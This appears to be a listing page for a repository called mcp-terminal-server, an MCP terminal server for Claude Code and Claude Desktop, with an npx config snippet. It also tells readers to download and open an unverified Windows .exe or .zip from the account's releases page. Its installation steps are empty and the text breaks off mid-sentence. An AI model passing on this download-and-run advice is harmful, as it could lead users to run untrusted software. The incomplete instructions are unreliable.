Unfathomable-siren38/mcp-terminal-server
Run an inline MCP terminal server with multi-session PTY support and tabbed xterm.js for Claude Code and Claude Desktop
Platform-specific configuration:
{
"mcpServers": {
"mcp-terminal-server": {
"command": "npx",
"args": [
"-y",
"mcp-terminal-server"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/Unfathomable-siren38/mcp-terminal-server/releases)
Visit this page to download: https://github.com/Unfathomable-siren38/mcp-terminal-server/releases
Choose the latest release for Windows, then download the file that matches your PC. After the file finishes downloading, open it to start the app or follow the setup steps in the release notes
mcp-terminal-server lets you use an interactive terminal inside Claude Code and Claude Desktop. It shows the terminal in the chat area, so you can work with command line tools without leaving your session
It supports more than one session at a time. That means you can keep separate terminal windows for different tasks, like one for builds and one for file work
After you visit the release page, look for the newest version at the top of the list. In most cases, the Windows download will be an .exe file or a .zip file
If you downloaded an .exe file:
If you downloaded a .zip file:
This app is made to work as an MCP server. That means Claude ca
Loading reviews...